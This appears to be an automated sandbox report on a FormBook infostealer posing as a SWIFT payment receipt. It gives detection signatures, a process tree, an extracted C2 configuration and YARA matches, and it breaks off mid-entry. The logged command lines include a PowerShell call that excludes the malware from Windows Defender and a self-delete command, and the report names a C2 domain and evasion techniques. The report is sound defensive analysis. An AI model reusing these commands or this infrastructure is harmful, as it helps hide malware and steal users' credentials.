Edit tour

Windows Analysis Report
Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Overview

General Information

Sample name:	Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe
Analysis ID:	1490435
MD5:	15cc82dce96d6980e2dc800b10a81495
SHA1:	005a539c30f4a640457dcd8b047278e8a93dd61b
SHA256:	7d39dde72383a557950523dfc9e5a64718323fcebf5d41aba286763c9ae7b39e
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe (PID: 5920 cmdline: "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe" MD5: 15CC82DCE96D6980E2DC800B10A81495)

powershell.exe (PID: 6468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe (PID: 1364 cmdline: "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe" MD5: 15CC82DCE96D6980E2DC800B10A81495)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

colorcpl.exe (PID: 2820 cmdline: "C:\Windows\SysWOW64\colorcpl.exe" MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

cmd.exe (PID: 5616 cmdline: /c del "C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jnhdh8827.com/pz12/"], "decoy": ["paucanyes.com", "autonwheels.com", "cowboysandcaviarbar.com", "fitnessuseredworkouts.com", "nuevobajonfavorito.com", "dflx8.com", "rothability.com", "sxybet88.com", "onesource.live", "brenjitu1904.com", "airdrop-zero1labs.com", "guangdongqiangzhetc.com", "apartments-for-rent-72254.bond", "ombak99.lol", "qqfoodsolutions.com", "kyyzz.com", "thepicklematch.com", "ainth.com", "missorris.com", "gabbygomez.com", "aromacuppa.com", "kaskusbagus.com", "zoox1.asia", "hemophilia-treatment-41433.bond", "meidupro.com", "shrisona.com", "sekanse.com", "marcocostasax.com", "loyalbahis356.com", "mzmz97.com", "ma-google.com", "xiangadvanced.site", "tuotalogis.com", "xcxocef.shop", "fidgetbottles.com", "shuaninvolved.site", "ambientelatino.com", "98980901.com", "singhbrothersframes.com", "pureamyl.com", "hgs0713.net", "surejobzapp.com", "slotgame99.bet", "datalakeflow.com", "ebehemin.com", "vanessasmobilespa.com", "317wb.com", "motchillssss.top", "huesch.net", "salesgymshark.shop", "mejorcompra99.com", "tacubashop.com", "jessicaxsimmons.com", "roar-stores.com", "chalkandthimble.com", "84556.vip", "luyutuwen.com", "siliconcollege.icu", "marvowhite.com", "gjxuh82y0u3h6.top", "e2taop5.top", "businessbroadway.com", "cripmz.xyz", "4hu259.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3351494869.0000000003650000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.3376444530.00000000115A7000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa42:$a2: pass 0xa48:$a3: email 0xa4f:$a4: login 0xa56:$a5: signin 0xa67:$a6: persistent 0xc3a:$r1: C:\Users\user\AppData\Roaming\217QNS3C\217log.ini
00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2227875031.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bb129:$a1: 3C 30 50 4F 53 54 74 09 40 0x2e9549:$a1: 3C 30 50 4F 53 54 74 09 40 0x316969:$a1: 3C 30 50 4F 53 54 74 09 40 0x2d1a98:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2ffeb8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x32d2d8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2bf8a7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2edcc7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x31b0e7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2ca78f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x2f8baf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x325fcf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2be7e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2bea5a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ecc00:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ece7a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31a020:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31a29a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ca58d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2f89ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x325dcd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2ca079:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2f8499:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3258b9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2ca68f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2f8aaf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x325ecf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2ca807:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2f8c27:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x326047:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bf472:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2ed892:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x31acb2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2171913312.00000000048BA000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2cd721:$sqlite3step: 68 34 1C 7B E1 0x2cd834:$sqlite3step: 68 34 1C 7B E1 0x2fbb41:$sqlite3step: 68 34 1C 7B E1 0x2fbc54:$sqlite3step: 68 34 1C 7B E1 0x328f61:$sqlite3step: 68 34 1C 7B E1 0x329074:$sqlite3step: 68 34 1C 7B E1 0x2cd750:$sqlite3text: 68 38 2A 90 C5 0x2cd875:$sqlite3text: 68 38 2A 90 C5 0x2fbb70:$sqlite3text: 68 38 2A 90 C5 0x2fbc95:$sqlite3text: 68 38 2A 90 C5 0x328f90:$sqlite3text: 68 38 2A 90 C5 0x3290b5:$sqlite3text: 68 38 2A 90 C5 0x2cd763:$sqlite3blob: 68 53 D8 7F 8C 0x2cd88b:$sqlite3blob: 68 53 D8 7F 8C 0x2fbb83:$sqlite3blob: 68 53 D8 7F 8C 0x2fbcab:$sqlite3blob: 68 53 D8 7F 8C 0x328fa3:$sqlite3blob: 68 53 D8 7F 8C 0x3290cb:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3349619553.0000000003520000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 5920	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x48440:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe PID: 1364	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3b1de:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x31c78:$s2: ~ Shell I 0x505fa:$s2: ~ Shell I
Process Memory Space: colorcpl.exe PID: 2820	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x619c0:$a1: 3C 30 50 4F 53 54 74 09 40 0x62a0c:$a1: 3C 30 50 4F 53 54 74 09 40 0x10bb63:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x76271:$a1: 3C 30 50 4F 53 54 74 09 40 0xa4691:$a1: 3C 30 50 4F 53 54 74 09 40 0xd1ab1:$a1: 3C 30 50 4F 53 54 74 09 40 0x8cbe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbb000:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe8420:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7a9ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xa8e0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd622f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x858d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xb3cf7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xe1117:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x79928:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7d48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7fc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd5168:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd53e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x856d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb3af5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe0f15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x851c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb35e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe0a01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x857d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb3bf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe1017:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8594f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb3d6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe118f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7a5ba:$sequence_5: 0F BE 5C 0E 